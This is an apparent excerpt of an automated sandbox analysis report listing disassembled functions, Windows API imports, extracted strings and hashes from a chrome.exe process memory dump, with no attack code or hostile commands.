QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF6456907F2
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF6456908C0

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: Thread$CurrentPerformancePriorityQuery$Counter$Frequency
String ID:
API String ID: 2845919953-0
Opcode ID: d41863f0bab7a74801a6e9eb888ce44538a42d068fcc9f8d36fef3bdd22693a4
Instruction ID: 9241b3c709ad758180d6aac8390c9fd30eaebf2a4d1e1795ca4e6d3adae04750
Opcode Fuzzy Hash: d41863f0bab7a74801a6e9eb888ce44538a42d068fcc9f8d36fef3bdd22693a4
Instruction Fuzzy Hash: BA518031A1DA529EE622FB24E8541797360BF45FA0F414331D94E963A0DF3CEC86C700

Function 00007FF6456CB6F0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 390COMMON

Download Yara Rule

Strings

Micr, xrefs: 00007FF6456CBA1F
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF6456CBA54
osof, xrefs: 00007FF6456CBA2C
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF6456CB9D0
t Hv, xrefs: 00007FF6456CBA38

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID:
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Micr$osof$t Hv
API String ID: 0-3846041463
Opcode ID: ffc7980804d91dd16e1d3ff1e57e6d48ca1c4d1261400109e334abcf9a82018e
Instruction ID: c5fcd134f915daae012747e33a312be954ae3cc393bd92a38d86d8f7715f28f1
Opcode Fuzzy Hash: ffc7980804d91dd16e1d3ff1e57e6d48ca1c4d1261400109e334abcf9a82018e
Instruction Fuzzy Hash: FCE13672B1C6458AEB26EB29D4412AD7BA0F754B84F488136DF4E8B7A1DF3CE945C340

Function 00007FF64568E2A0 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 379COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF64568E380
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF64568E415
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000010,3333333333333333,-5555555555555556,?,?,?,00000000,?,00007FF64569CA89), ref: 00007FF64568E452

Strings

first, xrefs: 00007FF64568E7DD, 00007FF64568E80B

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 263630f1d0c64731c2a633dcdcc5e80b77f3adc82f8f6008f0bd82b076963928
Instruction ID: e91044e0cf7468e1fcd3acd30da63a6d1c6f0e8aceb09b5ae80ca3b63aa35555
Opcode Fuzzy Hash: 263630f1d0c64731c2a633dcdcc5e80b77f3adc82f8f6008f0bd82b076963928
Instruction Fuzzy Hash: B4F1EF72A0DA5286EA24BB15E8103B96761EF86FD4F544231DB5E877A4DF3CEC82D301

Function 00007FF64568C440 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237COMMON

Download Yara Rule

APIs

ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF64568C5CF
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF64568C62D

Strings

%s (errno: %d, %s), xrefs: 00007FF64568C738
PERFETTO_CHECK(was_always_bound_), xrefs: 00007FF64568C72C
Shared memory buffer max stall count exceeded; possible deadlock (errno: %d, %s), xrefs: 00007FF64568C77A
..\..\third_party\perfetto\src\tracing\core\shared_memory_arbiter_impl.cc, xrefs: 00007FF64568C717, 00007FF64568C765

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLockRelease
String ID: %s (errno: %d, %s)$..\..\third_party\perfetto\src\tracing\core\shared_memory_arbiter_impl.cc$PERFETTO_CHECK(was_always_bound_)$Shared memory buffer max stall count exceeded; possible deadlock (errno: %d, %s)
API String ID: 1766480654-3492137015
Opcode ID: 01dae235d2586b96265fa09b20215b0a3ec7e829b0cd15907dac78067358da52
Instruction ID: 754bd98b087d185f2ca6ed25c9916901fa90bff41430141347014a9c6ad4502a
Opcode Fuzzy Hash: 01dae235d2586b96265fa09b20215b0a3ec7e829b0cd15907dac78067358da52
Instruction Fuzzy Hash: 5DA19E32A0DA468AFB24FB15E44437973A0FB45B84F504135DA4E8BBA4DF7CE9A9C701

Function 00007FF645732280 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF645732410
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF6457324F4

Strings

UUUUUUUU, xrefs: 00007FF645732455
33333333, xrefs: 00007FF645732468

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: 33333333$UUUUUUUU
API String ID: 17069307-3483174168
Opcode ID: 455277ef087dcb940d0442d43a2d3a2e45d16e912bc6a0374c9e41bcadddd422
Instruction ID: 535bd3d958fc48e0e9fe620b0ec28dd6c13736cd4be214484d7fe023641cf8ba
Opcode Fuzzy Hash: 455277ef087dcb940d0442d43a2d3a2e45d16e912bc6a0374c9e41bcadddd422
Instruction Fuzzy Hash: F0D1BD32A1D65686EA24BB16A05077C63A1BF54FA4F548132DF4E87FA4CF2DED82C704

Function 00007FF645762980 Relevance: 7.8, APIs: 5, Instructions: 337memoryCOMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF6457629C6
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00007FF645762E1C
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF645762E3F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00007FF645762E5F
TlsAlloc.KERNEL32 ref: 00007FF645762EAD

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$Alloc
String ID:
API String ID: 3005806778-0
Opcode ID: da041680a442123005105c18684c40a3959b796291f565dc2b972f6f2d3b5334
Instruction ID: 8507110a6287190d87fef69aff506ef6265c1f8f320d26b114df05e8c95b2c07
Opcode Fuzzy Hash: da041680a442123005105c18684c40a3959b796291f565dc2b972f6f2d3b5334
Instruction Fuzzy Hash: AFE10232A0DB8189E766EB20E4143AD77A4FB45B90F459235DB9D836A0DF38E996C300

Function 00007FF6457666E0 Relevance: 4.6, APIs: 3, Instructions: 75COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF64576677D
GetProductInfo.KERNEL32 ref: 00007FF64576679F
GetNativeSystemInfo.KERNEL32 ref: 00007FF645766838

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: Info$NativeProductSystemVersion
String ID:
API String ID: 609512817-0
Opcode ID: 7ca2a3334676425f2e85364f3f24935679fac0cb597130543e56c1852960a21e
Instruction ID: afce887e0415121a0f566de492ba05ca7dcdb2a141b024bd1c919ffed9c198b2
Opcode Fuzzy Hash: 7ca2a3334676425f2e85364f3f24935679fac0cb597130543e56c1852960a21e
Instruction Fuzzy Hash: 51411D75A1CAA69AF661FB10F8906B93360EB84F60F405231DA5D937A5DF2CFC86C704

Function 00007FF6456C5470 Relevance: 57.9, APIs: 1, Strings: 32, Instructions: 147COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6456C54B1

Strings

wcslen, xrefs: 00007FF6456C5748
RtlAllocateHeap, xrefs: 00007FF6456C5682
NtOpenProcessTokenEx, xrefs: 00007FF6456C557A
NtAllocateVirtualMemory, xrefs: 00007FF6456C54CA
strlen, xrefs: 00007FF6456C5732
NtClose, xrefs: 00007FF6456C550C
NtMapViewOfSection, xrefs: 00007FF6456C554E
NtUnmapViewOfSection, xrefs: 00007FF6456C5656
RtlDestroyHeap, xrefs: 00007FF6456C56DA
NtCreateFile, xrefs: 00007FF6456C54E0
memcpy, xrefs: 00007FF6456C575E
NtQueryInformationProcess, xrefs: 00007FF6456C55D2
NtSignalAndWaitForSingleObject, xrefs: 00007FF6456C5640
NtQueryAttributesFile, xrefs: 00007FF6456C55A6
NtDuplicateObject, xrefs: 00007FF6456C5522
NtWaitForSingleObject, xrefs: 00007FF6456C566C
RtlFreeHeap, xrefs: 00007FF6456C56F0
NtQueryVirtualMemory, xrefs: 00007FF6456C5614
RtlNtStatusToDosError, xrefs: 00007FF6456C5706
NtQueryObject, xrefs: 00007FF6456C55E8
NtOpenThread, xrefs: 00007FF6456C5564
NtSetInformationFile, xrefs: 00007FF6456C562A
_strnicmp, xrefs: 00007FF6456C571C
ntdll.dll, xrefs: 00007FF6456C54AA
NtProtectVirtualMemory, xrefs: 00007FF6456C5590
NtFreeVirtualMemory, xrefs: 00007FF6456C5538
RtlCompareUnicodeString, xrefs: 00007FF6456C56AE
RtlCreateHeap, xrefs: 00007FF6456C56C4
RtlAnsiStringToUnicodeString, xrefs: 00007FF6456C5698
NtCreateSection, xrefs: 00007FF6456C54F6
NtQuerySection, xrefs: 00007FF6456C55FE
NtQueryFullAttributesFile, xrefs: 00007FF6456C55BC

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: HandleModule
String ID: NtAllocateVirtualMemory$NtClose$NtCreateFile$NtCreateSection$NtDuplicateObject$NtFreeVirtualMemory$NtMapViewOfSection$NtOpenProcessTokenEx$NtOpenThread$NtProtectVirtualMemory$NtQueryAttributesFile$NtQueryFullAttributesFile$NtQueryInformationProcess$NtQueryObject$NtQuerySection$NtQueryVirtualMemory$NtSetInformationFile$NtSignalAndWaitForSingleObject$NtUnmapViewOfSection$NtWaitForSingleObject$RtlAllocateHeap$RtlAnsiStringToUnicodeString$RtlCompareUnicodeString$RtlCreateHeap$RtlDestroyHeap$RtlFreeHeap$RtlNtStatusToDosError$_strnicmp$memcpy$ntdll.dll$strlen$wcslen
API String ID: 4139908857-3460877470
Opcode ID: 4c266f6aa4b8195a5aeb08880579e65771a3c66d3a5a00dd2b8ebfad7b845a20
Instruction ID: 434b2961f5df2348b1fe70b1f57cce55c9f308c135fb508a7645b65b2a379d69
Opcode Fuzzy Hash: 4c266f6aa4b8195a5aeb08880579e65771a3c66d3a5a00dd2b8ebfad7b845a20
Instruction Fuzzy Hash: AA812230A0CA3299FA05BB15F8450B633A5AF84F45F504236E96DC7769EF3CAA06C341

Function 00007FF6458095B0 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 339COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF645809707
GetLastError.KERNEL32 ref: 00007FF645809A0A

Strings

AttemptToNotifyRunningChrome:Error SendFailed, xrefs: 00007FF645809A91
AttemptToNotifyRunningChrome:Error RemoteDied, xrefs: 00007FF645809A85
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF645809AD2
..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00007FF645809B93
AttemptToNotifyRunningChrome:SendMessage, xrefs: 00007FF645809BF6
N, xrefs: 00007FF6458098E5
source-shortcut, xrefs: 00007FF64580973D
START, xrefs: 00007FF645809769
AttemptToNotifyRunningChrome:Error RemoteHung, xrefs: 00007FF645809C20
AttemptToNotifyRunningChrome:GetCurrentDirectory failed, xrefs: 00007FF645809BC9
AttemptToNotifyRunningChrome, xrefs: 00007FF645809B0B
AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed, xrefs: 00007FF645809B62
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF645809ABF

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorInfoLastStartup
String ID: N$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$AttemptToNotifyRunningChrome$AttemptToNotifyRunningChrome:Error RemoteDied$AttemptToNotifyRunningChrome:Error RemoteHung$AttemptToNotifyRunningChrome:Error SendFailed$AttemptToNotifyRunningChrome:GetCurrentDirectory failed$AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed$AttemptToNotifyRunningChrome:SendMessage$START$source-shortcut
API String ID: 2260939616-2789412798
Opcode ID: 053e5e0f4d58a5d61dfde533dafa608743349090563aa6434cf196231c93d85f
Instruction ID: 384bc06c45ff13fd19d5bdeb3916534336a4903f426aa4bf7352a3e3697605ef
Opcode Fuzzy Hash: 053e5e0f4d58a5d61dfde533dafa608743349090563aa6434cf196231c93d85f
Instruction Fuzzy Hash: 3EF14971A0DBA298EA21BB14E4513FA73A0EB86F84F414136DACC87A95DF7DE945C700

Function 00007FF645751270 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6457512C2
SetLastError.KERNEL32 ref: 00007FF6457512CC
SetLastError.KERNEL32 ref: 00007FF6457512E0
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF64575139A
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF6457513FD
QueryPerformanceCounter.KERNEL32 ref: 00007FF64575142E
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF6457514E1
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF6457515DE
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF645751600

Strings

<, xrefs: 00007FF6457515CD
..\..\third_party\libc++\src\include\optional:801: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00007FF645751668

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireErrorLast$Release$CounterPerformanceQuery
String ID: ..\..\third_party\libc++\src\include\optional:801: assertion this->has_value() failed: optional operator* called on a disengaged value$<
API String ID: 593636287-161334329
Opcode ID: a56985ed5cd8e9e98d8a70c2b9fb2b47183ff1d268c8f27e9fab4ae96d568509
Instruction ID: 1a16fd1ed2e6dc354e966b0a54de8426926059309e9f51e8ac2de8908cb5d63c
Opcode Fuzzy Hash: a56985ed5cd8e9e98d8a70c2b9fb2b47183ff1d268c8f27e9fab4ae96d568509
Instruction Fuzzy Hash: 0AC1CE21A0CA4A85FB61BB21E55037923A1FF45FD9F454132DA8E97AA1DF3CEC85C309

Function 00007FF6456A5F20 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 260COMMON

Download Yara Rule

Strings

..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF6456A60D7
..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00007FF6456A60A7
SetUnhandledExceptionFilter, xrefs: 00007FF6456A6317
..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF6456A63AE
/prefetch:7, xrefs: 00007FF6456A621B
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF6456A6465
kernel32.dll, xrefs: 00007FF6456A6301
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF6456A6094, 00007FF6456A6452
database, xrefs: 00007FF6456A6255

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
